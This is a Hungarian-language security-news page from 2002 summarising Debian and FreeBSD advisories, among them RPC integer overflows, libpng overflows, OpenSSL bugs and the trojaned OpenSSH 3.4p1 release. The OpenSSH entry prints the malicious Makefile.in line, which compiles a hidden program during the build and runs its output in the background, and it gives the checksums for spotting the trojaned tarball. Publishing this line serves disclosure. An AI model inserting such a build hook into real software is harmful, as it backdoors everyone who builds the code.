Bug

DSA 151-1 Az új xinetd csomagok javítják a helyi DoS-t

 ( gyu | 2002. augusztus 14., szerda - 10:51 )

Csomagok: xinetd

Sebezhetőség: cső expozízió

Probléma-típus: helyi

Debian-specifikus: nem



A Solar Designer talált egy sebezhetőséget az xinetd-ben, ami a BSD-ből származó inetd kiváltására van. A jelző cső fájl deszkriptorai a 2.3.4 verzióban jelentek meg és átszivárognak az xinetd-ből indított szolgáltatásokba. A deszkriptorokat fel lehet használni arra, hogy "beszéljünk" az xinetd-hez és teljesen összeomlasszuk. Ez általában a szolgáltatás letiltását (DoS) okozza.

DSA 150-1 Az új interchange csomagok javítják az illegális fájl kezelést

 ( gyu | 2002. augusztus 14., szerda - 10:35 )

Csomag: interchange

Sebezhetőség: illegális fájl kezelés

Probléma típus: távoli

Debian-specifikus: nem



Egy problémát találtak az Interchange-ben, ami egy e-commerce és általános HTTP adatbázis megjelenítő rendszer, ami lehetővé teszi egy támadónak, hogy olvasson bármilyen fájlt, amihez az Interchange démon-t futtató felhasználó hozzáfér, amikor az Interchange "INET módban" (Internet domain socket) fut. Nem ez az alapértelmezett beállítás a Debian csomagoknál, habár ez konfigurálható a Debconf-al, és konfigurációs fájlokon keresztül. Azt is hisszük, hogy a hibát nem lehet egy szabályos Debian rendszeren kihasználni.

DSA 149-1 Az új glibc csomagok javítják a biztonsági problémákat

 ( gyu | 2002. augusztus 13., kedd - 11:43 )

Csomag: glibc

Sebezhetõség: egész túlcsordulás

Probléma típus: távoli

Debian-specifikus: nem

CVE Id: CAN-2002-0391

CERT advisory: VU#192995



Egy egész túlcsordulási hibát találtak az RPC könyvtárban, amit a GNU libc használ, és a SunRPC könyvtárból származik. Ezt a hibát ki lehet használni jogosulatlan root hozzáférés szerzésére, ha egy szoftvert ehhez a kódhoz szerkesztünk. Az alábbi csomagok az egész túlcsordulási hibát is javítják a malloc kódjában. Valamint tartalmaznak egy javítást Andreas Schwab-tól, hogy csökkentsék a linebuflen-t, hogy ne ütközzön a párhuzamosan az NSS DNS-kódban levõ puffer-mutatóval.

A FlashPlayer bugjai miatt támadhatóak a számítógépek

 ( trey | 2002. augusztus 12., hétfő - 21:54 )

Két hibát fedeztek fel a szakemberek a Macromedia Flash Player programban, amelyet kihasználva a számítógépeink támadhatóvá válnak. A hiba a Windows és a Unix verziót is érinti!

DSA 148-1 Az új hylafax csomagok javítják a biztonsági problémákat

 ( gyu | 2002. augusztus 12., hétfő - 9:37 )

Csomag: hylafax

Sebezhetőség: puffer-túlcsordulás és formátum-sztring sebezhetőség

Probléma típus: távoli

Debian-specifikus: nem

CVE Id: CAN-2001-1034

Bugtraq Id: 3357,5349,5348



Több problémát találtak a Hylafax-ban, ami egy rugalmas kliens/szerver faxprogram, amit sok GNU/Linux disztribúcióban meg lehet találni. A SecurityFocus, a következőket írja a problémákról:

Hibát találtak az Apache 2.0 szerverekben nem-Unix platformon

 ( trey | 2002. augusztus 10., szombat - 14:43 )

Mark J Cox [mjc@apache.org] egy levelet küldött a vuln-dev@ securityfocus levelezési listára, miszerint az Apache HTTP szerver 2.0-ás verzióiban egy jelentős hibát találtak, amelyet nem-Unix platformon lehet kihasználni. A hibát kihasználva a támadó károkat okozhat a szerver tartalmában, és érzékeny információkhoz juthat. A hiba az Apache szerver alap (default) telepítésekor jelentkezik.



Bejelentés:

DSA 147-1 Új mailman csomagok javítják az oldalközi szkriptelhetőséget

 ( gyu | 2002. augusztus 9., péntek - 9:32 )

Csomag: mailman

Sebezhetőség: oldalak-közti scriptelhetőség

Probléma típus: távoli

Debian-specifikus: nem

CVE Id: CAN-2002-0388



Egy oldalközi scriptelési sebezhetőséget találtak a mailmanben, ami egy levelezési listák managelését szolgáló szoftver. Amikor egy jólformált ravasz URL-t nyitunk meg az Internet Explorerrel (úgy tűnik, más brozerek nem érintettek a hibában), az ereményül kapott weboldal hasonlítani fog az igazira, de egy javascript komponenst is lefuttat, amit egy támadó felhasználhat arra, hogy érzékeny információkat szerezzen. Az új verziójú Debian 2.2 csomagok szintén tartalmazzák a biztonságilag érintett foltokat a mailman 2.0.11 verziójából.

DSA 146-2 Az új dietlibc csomagok javítják az egész túlcsordulást

 ( gyu | 2002. augusztus 9., péntek - 9:16 )

Csomag: dietlibc

Sebezhetőség: egész túlcsordulás

Probléma típus: távoli

Debian-specifikus: nem

CVE Id: CAN-2002-0391

CERT advisory: VU#192995



A dietlibc upstream szerzője, Felix von Leitner, felfedezett egy lehetséges nullával osztást az fwrite és calloc egész túlcsordulás ellenőrzésénél, amit az alábbi verziók javítanak.

DSA 146-1 Az új dietlibc csomagok javítják az egész túlcsordulást

 ( gyu | 2002. augusztus 8., csütörtök - 11:19 )

Csomag: dietlibc

Sebezhetőség: egész túlcsordulás

Probléma típus: távoli

Debian-specifikus: nem

CVE Id: CAN-2002-0391

CERT hibajegy: VU#192995



Egy egész túlcsordulási hibát találtak az RPC könyvtárban, amit a dietlibc használt. Ez egy optimalizált, kis méretű libc, ami a SunRPC könyvtárból származik. Ezt a hibát ki lehet használni hogy jogosulatlanul root hozzáférés szerezésre egy olyan programon keresztül, ami ehhez a könyvtárhoz van szerkesztve. Az alábbi csomagok javítják az egész túlcsordulást a calloc, fread, és fwrite kódjában. Ezek szigorúbbak a rosszindulatú DNS csomagokat tekintve, amelyek szintén sebezhetőséghez vezethetnek.

DSA 145-1 Az új tinyproxy csomagok javítják a sebezhetőséget

 ( gyu | 2002. augusztus 8., csütörtök - 9:34 )

Csomag: tinyproxy

Sebezhetőség: duplán felszabadított memória

Probléma típus: távoli

Debian-specifikus: nem

Bugtraq Id: 4731



A tinyproxy, ami egy pehelysúlyú HTTP proxy, szerzői találtak egy hibát néhány érvénytelen proxy-kérés kezelésével kapcsolatban. Bizonyos körülmények között egy érvénytelen kérés azt eredményezheti, hogy egy lefoglalt memóriaterületet kétszer szabadít fel. Ez esetlegesen tetszőleges kód futtatását teheti lehetővé.

DSA 144-1 Az új wwwoffle csomag javítja a biztonsággal kapcsolatos problémákat

 ( gyu | 2002. augusztus 6., kedd - 11:09 )

Csomag: wwwoffle

Sebezhetőség: nem megfelelő input kezelés

Probléma-típus: helyi

Debian-specifikus: nem

CVE Id: CAN-2002-0818



Egy problémát fedeztek fel a wwwoffle-val kapcsolatban. A web proxy nem kezeli megfelelően az input data-t, ahol a Content-Length beállítás egy negatív szám, és a feldolgozást végző gyerekprocesszt összeomlasztja. Jelenleg nem világos, hogyan lehetne ezt a sebezhetőséget kihasználmi, habár jobb biztonságban lenni, mint sajnálkozni, szóval itt a frissítés.

DSA 143-1 Az új krb5 csomagok javítják az ''egész''-túlcsordulási hibát

 ( gyu | 2002. augusztus 6., kedd - 9:22 )

Csomag: krb5

Sebezhetőség: egész túlcsordulás

Probléma-típus: távoli

Debian-specifikus: nem

CERT hibajegy: VU#192995



Egy egész túlcsordulási hibát találtak az RPC könyvtárban, amit a Kerberos 5 adminisztrációs rendszer is használ. Az említett RPC könyvtár a SunRPC könyvtárból származik. Ezt a hibát ki lehet használni jogosulatlan root szerzésre egy KDC hoszton. Úgy hiszik, hogy a támadónak autentikálnia kell tudnia magát a kadmin démon felé, hogy a támadása sikeres legyen. Jelenleg nem ismeretes létező törés.

DSA 142-1 Az új OpenAFS csomagok javítják az ''egész''túlcsordulási hibát

 ( gyu | 2002. augusztus 5., hétfő - 12:11 )

Csomag: openafs

Sebezhet?ség: egész túlcsordulás

Proobléma-típus: távoli

Debian-specifikus: nem



Egy egész túlcsordulási hibát fedeztek fel az RPC könyvtárban amit az OpenAFS adatbázisszerver használ, és az említett könyvtár a SunRPC könyvtárból származik. Ezt a hibát ki lehet használni hogy összeomlasszunk bizonyos OpenAFS szervereket (volserverr, vlserverr, ptserver, buserver) vagy jogosulatlanul root hozzáférést szerezzünk, egy olyan gépen, ami futtatja a fenti processzek valamelyikét. Még nem ismeretes léteez? exploit a hibára.

DSA 140-2 Az új libpng csomagok javítanak egy lehetséges puffertúlcsordulást

 ( gyu | 2002. augusztus 5., hétfő - 11:10 )

Csomag: libpng, libpng3

Sebezhetőség: Puffer-túlcsordulás

Probléma-típus: távoli

Debian-specifikus: nem



Kiegészítésként a DSA-140-1-es biztonsági hibajegyhez az alábbi csomagok javítást tartalmaznak egy lehetséges puffer-túlcsordulási hibára. A PNG könyvtár megvalósít egy biztonsági-ráhagyást, amit szintén betettek az "upstream" kiadásba. Köszönet illeti Glenn Randers-Pehrson-t, aki informálta a Debian Security Team-et.

DSA 141-1 mpack puffer túlcsordulás

 ( szogi | 2002. augusztus 2., péntek - 11:28 )

Csomag: mpack

Sebezhetőség: buffer overflow

Probléma típusa: távoli

Debian specifikus: nem




Eckehard Berns egy nem debian specifikus puffertúlcsordulást felfedezett fel a mupack programban, amit binaris - MIME dekódoláshoz használnak e-mail-ekben. Ezzel a hibával akár tetszőleges kód is lefuttatható. Azonnali frissítés javasolt...

Niels Provos: OpenSSH Security Advisory: Trojaned Distribution Files

 ( trey | 2002. augusztus 1., csütörtök - 16:45 )

Niels Provos bejelentette a trójai OpenSSH dolgot a security-announce@, misc@ és announce@ OpenBSD listákon. Mint kiderült több csomag is érintett. Az érintett verziók:

  • OpenSSH version 3.2.2p1
  • OpenSSH version 3.4p1
  • OpenSSH version 3.4

A backdooros stuff július 30. és július 31. között került a szerverekre, és onnan kerültek át más szerverekre a normál mirrorozási folyamattal.

Kapcsolódó cikkek:
OpenSSH hiba ismét!
OpenSSH trójai!

DSA 140-1 Az új libpng csomagok javítják a puffertúlcsordulást

 ( gyu | 2002. augusztus 1., csütörtök - 15:28 )

Csomag: libpng2, libpng3

Támadhatóság: puffer-túlcsordulás

Probléma-típus: távoli

Debian-specifikus: nem



A PNG könyvtár fejlesztői kijavították a puffer-túlcsordulási hibát a progresszív olvasójában, ami akkor jön elő, ha a PNG adatfolyam több IDAT adatot tartalmaz mint amennyit az "IHDR chunk" jelez. Ilyen előkészített helytelen adatfolyamok összeomlasztják az alkalmazást, ami esetleg lehetővé teszi a támadó számra, hogy szabotáló kódot futtasson. Az olyan programok, mint a Galeon, Konqueror és számos más egyéb program használják ezeket a könyvtárakat.

DSA 139-1 Az új super csomagok javítják a helyi root exploitot

 ( gyu | 2002. augusztus 1., csütörtök - 14:54 )

Csomag: super

Támadhatóság: format string vulnerability

Probléma típus: helyi

Debian-specifikus: nem



A GOBBLES talált egy nem biztonságos használati módot a super csomag formátumsztringjeiben. A szuper nevű program arra való, hogy megfelelő rendszer-felhasználókhoz való hozzáférst adjon az néhány felhasználónak, úgy mint a szuper nevű program. (megj. most én nem értem rendesen az eredeti angol mondatot, vagy tényleg ilyen önrekurzív hülye módon fogalmazták meg? :-)) Kihasználva ezt a formátumsztring-támadhatóságot, a helyi felhasználók jogosulatlanul root hozzáférést szerezhetnek.

OpenSSH trójai!

 ( bra | 2002. augusztus 1., csütörtök - 10:23 )

A portolható OpenSSH forráskódjában trójai kódot fedezett fel Edwin Groothuis. Az ftp.openbsd.org-on és annak tükrein elérhető fájl MD5 ellenőrzőösszege:

MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

míg az eredeti fájlé:

MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

Az eredetihez képest az openssh-3.4p1/openbsd-compat/Makefile.in fájl változott meg, amelyhez a következő sort adták:

all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

A bf-test.c fájl a portolható OpenSSH forráskódjában soha nem szerepelt és a Makefile.in CVS információi is kitaláltak, így a gyanú beigazolódni látszik.

OpenSSH hiba ismét!

 ( Anonymous | 2002. augusztus 1., csütörtök - 10:14 )

Ismét bebizonyosodott, hogy semmi sem tökeletes. Még a "javított" OpenSSH sem... Egy igen érdekes levelet lehet olvasni a freebsd-security@ levlistán. A levél írója szerint a 3.4-es OpenSSH BACKDOOR-os! Mindenki nézzen utána a kérdesnek, gyakorlatilag megint nem vagyunk biztonságban.

Olvasd el a levelet itt.

FreeBSD Security Advisory FreeBSD-SA-02:34.rpc

 ( trey | 2002. augusztus 1., csütörtök - 9:12 )

Topic: Sun RPC XDR dekóder 'buffer overflow' hibát tartalmaz
Kategória: core
Modul: libc
Bejelentve: 2002-07-31
Közreműködők: ISS X-Force
Érintett rendszerek: Az összes FreeBSD kiadás, beleértve a 4.6.1-RELEASE-p3 -at is
Javítva:


2002-07-31 14:45:29 UTC (RELENG_4)
2002-07-31 14:47:02 UTC (RELENG_4_6)
2002-07-31 14:49:18 UTC (RELENG_4_5)
2002-07-31 14:50:18 UTC (RELENG_4_4)


FreeBSD specifikus: nem

A bejelentés:

DSA-138-1: gallery - remote exploit

 ( trey | 2002. augusztus 1., csütörtök - 7:37 )

Csomag: gallery
Támadhatóság: remote exploit
Probléma-típus: távoli
Debian-specifikus: nem

Problémát találtak a gallery (web alapú fotó album) eszközben. A probléma a GALLERY_BASEDIR változóval van. A hibát kihasználva lehetőség nyílhat arra, hogy a webszerveren parancsokat hajtson végre a rosszindulatú támadó a webszervert futtató felhasználó nevében (uid).

A hiba javítva van az 1.2.5-7 verziójú Debian csomagban.

Az eredeti hibajelentés: DSA-138-1
Frissétésről szóló FAQ

FreeBSD Security Advisory: FreeBSD-SA-02:32.pppd

 ( trey | 2002. július 31., szerda - 16:30 )

Sebastian Krahmer [krahmer@suse.de] egy kihasználható 'race condition' típusú hibát talált a FreeBSD pppd implementációjában. A hiba FreeBSd összes kiadását érinti, beleértve a 4.6.1-RELEASE-p1-t is. A hiba javítva van az alábbi kiadásokban:

2002-07-30 03:50:40 UTC (RELENG_4)
2002-07-30 19:15:52 UTC (RELENG_4_6)
2002-07-30 19:16:46 UTC (RELENG_4_5)
2002-07-30 19:17:27 UTC (RELENG_4_4)

A hiba nem FreeBSD specifikus. A javítás, workaround, patch és egyébb információkért olvasd el a bejelentést:

DSA-137-1: Az új mm csomagok javítják a nembiztonságos temp-fájl létrehozást

 ( gyu | 2002. július 30., kedd - 19:02 )

Csomag: mm

Támadhatóság: Nembiztonságos ideiglenes fájlok

Probléma-típus: helyi

Debian-specifikus: nem

CVE Id: CAN-2002-0658



Marcus Meissner és Sebastian Krahmer fedezte fel és javította egy tempfájl-támadhatóságot az mm nevû osztott memóriakönyvtárban. Ez a probléma kihasználható root-jogosultságok szerzésére egy olyan gépen, ami apache-ot futtat, és az apache ehhez az osztott könyvtárhoz van linkelve. Feltéve ha egy user hozzáfér egy eleve adott "www-data" shellhez (amit könnyen lehet szerezni pl. a PHP-n keresztül.)

DSA-136-1 Többszörös OpenSSL problémák

 ( gyu | 2002. július 30., kedd - 14:51 )

Csomag : openssl

Probléma típus: több távolról kihasználható hiba

Debian-specifikus: nem

CVE: CAN-2002-0655 CAN-2002-0656 CAN-2002-0657 CAN-2002-0659



Az OpenSSL fejlesztõi team bejelentette, hogy A.L Digital LTD.-tõl és a DARPA CHATS programjához tartozó "The Bunker" által végzett security audit több távolról kihasználható puffer-túlcsordulási hibát talált az OpenSSL kódjában. Továbbá az OpenSSL ASN1 értelmezõje lehetséges, hogy DoS-ra érzékeny, amely hibát egymástól függetlenül talált meg Adi Stav és James Yonan.